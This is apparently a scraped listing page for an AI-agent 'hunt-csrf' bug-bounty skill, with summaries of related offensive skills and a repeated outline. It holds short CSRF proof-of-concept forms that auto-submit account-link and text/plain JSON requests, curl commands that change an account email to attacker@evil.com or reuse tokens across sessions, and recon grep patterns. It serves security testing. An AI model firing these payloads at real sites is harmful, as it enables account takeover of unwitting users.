Run any Skill in Manus with one click

$pwd:

hunt-csrf

Name: Hunt Csrf
Author: elementalsouls

// Hunting skill for csrf vulnerabilities. Built from 15 public bug bounty reports including modern variants — SameSite=Lax sibling-subdomain bypass (Argo CD CVE-2024-22424), GraphQL mutations-via-GET (GitLab $3,370), framework-wide CSRF middleware disabled (Stripe Dashboard $5,000), path-traversal CSRF-token bypass (GitHub Enterprise CVE-2022-23732 $10k), Origin-omission bypass (TikTok $2,500), OAuth-state null-byte (Streamlabs), WebSocket CSRF / CSWSH (Coda), default-SameSite email-change → ATO (YoYo Games $400), social-account-link CSRF (HackerOne), JSON-CSRF via text/plain on email-change (TikTok $500). Use when hunting modern CSRF — heavy emphasis on chain-to-ATO patterns.

Run Skill in Manus

$ git log --oneline --stat

stars:1,380

forks:195

updated:May 25, 2026 at 20:56

SKILL.md

readonly

related-skills.json

same repository

cloud-iam-deep.md

from "elementalsouls/Claude-BugHunter"

Cloud IAM red-team attack chain across AWS, Azure, GCP — focused on EXTERNAL exploitation paths and post-credential-discovery privilege analysis. Covers IAM enumeration (aws iam, az role, gcloud iam), STS/AssumeRole chaining, Azure Managed Identity abuse (via SSRF/leak), GCP service account JSON abuse, IMDSv1/v2 attacks via SSRF, K8s ServiceAccount token exfil, role-trust-policy confused-deputy, cross-account assume-role enumeration, IAM privilege escalation patterns (24+ AWS, 8+ Azure, 6+ GCP), and AWS Cognito Identity Pool unauthenticated-role attack chain (GetId → GetCredentialsForIdentity → IAM role abuse). Built for the case where recon yields a credential (key, JSON, token) and you need to know what it grants and how to escalate. Use when an AWS key / Azure secret / GCP service account JSON / K8s SA token surfaces from a code repo, JS bundle, APK, breach corpus, or SSRF chain.

2026-05-251.4k

hunt-api-misconfig.md

from "elementalsouls/Claude-BugHunter"

Hunt API security misconfiguration — mass assignment, JWT attacks, prototype pollution, CORS, HTTP verb tampering. Mass assignment: send {is_admin:true, role:admin, verified:true} on profile/account/reset endpoints — server blindly applies. JWT: alg=none, weak HMAC bruteforce, kid path traversal, JWK injection, token confusion. Prototype pollution: __proto__ injection in JSON merge / Object.assign / lodash _.merge → polluted prototype reaches sink (RCE in Node, XSS in browser). CORS: wildcard with credentials, null origin, regex with subdomain takeover, postMessage origin checks. HTTP verb: GET-bypass-CSRF, X-HTTP-Method-Override, TRACE enabled. Detection: API responses with extra fields, JWTs in headers (decode at jwt.io), CORS preflight responses. Use when hunting API misconfigs, JWT flaws, mass-assignment, prototype pollution, CORS bypasses.

2026-05-251.4k

hunt-auth-bypass.md

from "elementalsouls/Claude-BugHunter"

Hunting skill for auth bypass vulnerabilities. Built from 12 public bug bounty reports across SAML XSW / parser-differential (GitHub Enterprise CVE-2025-25291/25292), SAML signature stripping (Uber, Rocket.Chat, samlify CVE-2025-47949), SAML domain enforcement bypass via control characters (HackerOne 2024), partner-portal cross-IdP assertion reuse (Slack), WordPress XMLRPC bypassing SSO (Uber), JWT alg-confusion HS256/RS256 (Jitsi), JWT signature-validation skip (Linktree, Newspack), and token-audience confusion (Argo CD CVE-2023-22482). Use when hunting auth bypass — see the Legacy-Protocol Matrix for branded-UI vs legacy-endpoint patterns.

2026-05-251.4k

hunt-business-logic.md

from "elementalsouls/Claude-BugHunter"

Hunting skill for business logic vulnerabilities. Built from 12 public bug bounty reports. Covers coupon-race-stacking (Instacart, Stripe, Reverb), negative-quantity-in-cart price tampering (Upserve, Eternal/Zomato), decimal/fraction price-field overflow (Shipt), client-side checkout amount trust on PayPal redirect (WordPress.org), price-per-unit mass-assignment (Krisp), and archived-price swap / cart-TOCTOU (Stripe). Use when hunting business logic — heavy emphasis on financial-impact-demonstrated cases.

2026-05-251.4k

hunt-cache-poison.md

from "elementalsouls/Claude-BugHunter"

Hunting skill for cache poison vulnerabilities. Built from 10 public bug bounty reports including X-Forwarded-Host poisoning, X-HTTP-Method-Override / GCS cache, reflected→stored XSS via cache, classic Omer-Gil Web Cache Deception, Cloudflare Cache Deception Armor bypass, session-token cache deception, Akamai hop-by-hop smuggling → server-side edge poisoning, and Kettle's 2024 path-normalization WCD against Cloudflare/Fastly/GCP. Use when hunting cache poisoning, Web Cache Deception, CDN-fronted apps.

2026-05-251.4k

hunt-cloud-misconfig.md

from "elementalsouls/Claude-BugHunter"

Hunt cloud / infrastructure misconfigurations. AWS: public S3 buckets (s3:GetObject anonymous), permissive bucket policies (PutObjectAcl public-write), exposed CloudFront origin, public Lambda function URL, public RDS snapshot, IAM credentials in JS bundles, AWS metadata accessible via SSRF. GCP: public GCS buckets, exposed Cloud Run services, leaked service account JSON. Azure: public blob containers, exposed Function App. K8s: kubelet 10250 unauth, etcd 2379, dashboard public, services API public, pod metadata service. CI/CD: Jenkins /script console, GitLab Runner registration token, GitHub Actions workflow with pull_request_target injection. Container: Docker daemon 2375, Kubernetes API anonymous. Detection: targeted dorking, certificate transparency, JS bundle secret extraction, port scan for known service ports. Validate: actual data read / write / RCE. Use when hunting cloud-native attack surface.

2026-05-251.4k

package.json

"author": "elementalsouls"

"repository": "elementalsouls/Claude-BugHunter"

View GitHub Repository View Creator Repositories

$ install --global

$ download --local

Run Skill in Manus

$ useful --forSOC

Information Security AnalystsComputer and Mathematical Occupations15-1212L4

# Missing or weak SameSite cookie attributes Set-Cookie: session=abc123; HttpOnly # no SameSite = vulnerable Set-Cookie: session=abc123; SameSite=None # explicitly allows cross-site # Missing CSRF headers # No X-Frame-Options or permissive CORS Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true # dangerous combo

// Static or predictable CSRF tokens meta[name="csrf-token"] // grep if value changes across sessions authenticity_token // Rails — check if reused across page loads // JSON endpoints without Content-Type enforcement fetch('/api/heartbeat', {method: 'POST', body: JSON.stringify(data)}) // No CSRF token in form at all <form method="POST" action="/accounts/link"> // no hidden token field

<html> <body onload="document.forms[0].submit()"> <form method="POST" action="https://target.com/api/v1/account/link"> <input type="hidden" name="provider" value="attacker_account_id" /> <input type="hidden" name="token" value="oauth_token_here" /> </form> </body> </html>

<html> <body onload="document.forms[0].submit()"> <form method="POST" action="https://target.com/api/heartbeat" enctype="text/plain">  <input type="hidden" name='{"status":"ok","x":"' value='padding"}' /> </form> </body> </html>

# Capture a valid request, then replay without token curl -s -X POST https://target.com/settings/email \ -H "Cookie: session=YOUR_SESSION" \ -d "email=attacker@evil.com" \ -v 2>&1 | grep -E "HTTP|location|error"

# Get token from session A TOKEN_A=$(curl -s https://target.com/settings -H "Cookie: session=SESSION_A" \ | grep -oP 'authenticity_token[^"]*value="\K[^"]+') # Use token A in session B's request curl -s -X POST https://target.com/settings/update \ -H "Cookie: session=SESSION_B" \ -d "authenticity_token=$TOKEN_A&email=test@test.com" \ -v

# Find CSRF token fields in HTML responses grep -Eo 'name="(csrf|_token|authenticity_token|csrfmiddlewaretoken)"[^>]*value="[^"]+"' # Find forms without CSRF tokens grep -B5 -A20 '<form method="[Pp][Oo][Ss][Tt]"' response.html | grep -L "csrf\|token\|nonce" # Check SameSite in response headers curl -sI https://target.com/login | grep -i "set-cookie" # Find RelayState parameters grep -r "RelayState" --include="*.js" .

name	hunt-csrf
description	Hunting skill for csrf vulnerabilities. Built from 15 public bug bounty reports including modern variants — SameSite=Lax sibling-subdomain bypass (Argo CD CVE-2024-22424), GraphQL mutations-via-GET (GitLab $3,370), framework-wide CSRF middleware disabled (Stripe Dashboard $5,000), path-traversal CSRF-token bypass (GitHub Enterprise CVE-2022-23732 $10k), Origin-omission bypass (TikTok $2,500), OAuth-state null-byte (Streamlabs), WebSocket CSRF / CSWSH (Coda), default-SameSite email-change → ATO (YoYo Games $400), social-account-link CSRF (HackerOne), JSON-CSRF via text/plain on email-change (TikTok $500). Use when hunting modern CSRF — heavy emphasis on chain-to-ATO patterns.
sources	github, hackerone_public, bugcrowd_public, github_security_advisories
report_count	15

hunt-csrf

More from this repository

More from this repository

Crown Jewel Targets

Attack Surface Signals

URL Patterns

Response Header Signals

JS / DOM Patterns

Tech Stack Signals

Step-by-Step Hunting Methodology

Payload & Detection Patterns

Basic CSRF PoC (Form POST)

JSON CSRF via text/plain (bypasses Content-Type check)

curl: Test CSRF token omission

curl: Test token reuse across sessions

Grep patterns for recon

Grafana CVE-2022-21703 version check

Common Root Causes

Bypass Techniques

Defense: SameSite=Lax cookies

Defense: CSRF token present

Defense: Content-Type: application/json enforcement

Defense: Referer/Origin header check

Defense: Double-submit cookie pattern

Defense: Custom request header (e.g., X-Requested-With)

Gate 0 Validation

Real Impact Examples

Scenario 1: Social Account Takeover via Import Friends (Rockstar Games)

Scenario 2: Facebook Account Hijacking via Oculus Integration CSRF

Scenario 3: JSON API CSRF on Heartbeat/Activity Tracking

Disclosed Report Citations (Backfill +5 — 2020-2024)

Duende BFF — Role-Partitioned Antiforgery (2024-2026 surface)

Attack class 1 — X-CSRF: 1 is not user-bound, so cross-role replay succeeds same-origin

Attack class 2 — SignalR/WebSocket carve-out (the /negotiate shortcut)

Attack class 3 — Cookie-domain wildcarding turns subdomain takeover into session fixation

Evidence strength

Hunting checklist

Related Skills & Chains

Crown Jewel Targets

Attack Surface Signals

URL Patterns

Response Header Signals

JS / DOM Patterns

Tech Stack Signals

Step-by-Step Hunting Methodology

Payload & Detection Patterns

Basic CSRF PoC (Form POST)

JSON CSRF via text/plain (bypasses Content-Type check)

curl: Test CSRF token omission

curl: Test token reuse across sessions

Grep patterns for recon

Grafana CVE-2022-21703 version check

Common Root Causes

Bypass Techniques

Defense: SameSite=Lax cookies

Defense: CSRF token present

Defense: Content-Type: application/json enforcement

Defense: Referer/Origin header check

Defense: Double-submit cookie pattern

Defense: Custom request header (e.g., X-Requested-With)

Gate 0 Validation

Real Impact Examples

Scenario 1: Social Account Takeover via Import Friends (Rockstar Games)

Scenario 2: Facebook Account Hijacking via Oculus Integration CSRF

Scenario 3: JSON API CSRF on Heartbeat/Activity Tracking

Disclosed Report Citations (Backfill +5 — 2020-2024)

Duende BFF — Role-Partitioned Antiforgery (2024-2026 surface)

Attack class 1 — X-CSRF: 1 is not user-bound, so cross-role replay succeeds same-origin

Attack class 2 — SignalR/WebSocket carve-out (the /negotiate shortcut)

Attack class 3 — Cookie-domain wildcarding turns subdomain takeover into session fixation

Evidence strength

Hunting checklist

Related Skills & Chains

Defense: `Content-Type: application/json` enforcement

Defense: Custom request header (e.g., `X-Requested-With`)

Attack class 1 — `X-CSRF: 1` is not user-bound, so cross-role replay succeeds same-origin

Attack class 2 — SignalR/WebSocket carve-out (the `/negotiate` shortcut)

Defense: `Content-Type: application/json` enforcement

Defense: Custom request header (e.g., `X-Requested-With`)

Attack class 1 — `X-CSRF: 1` is not user-bound, so cross-role replay succeeds same-origin

Attack class 2 — SignalR/WebSocket carve-out (the `/negotiate` shortcut)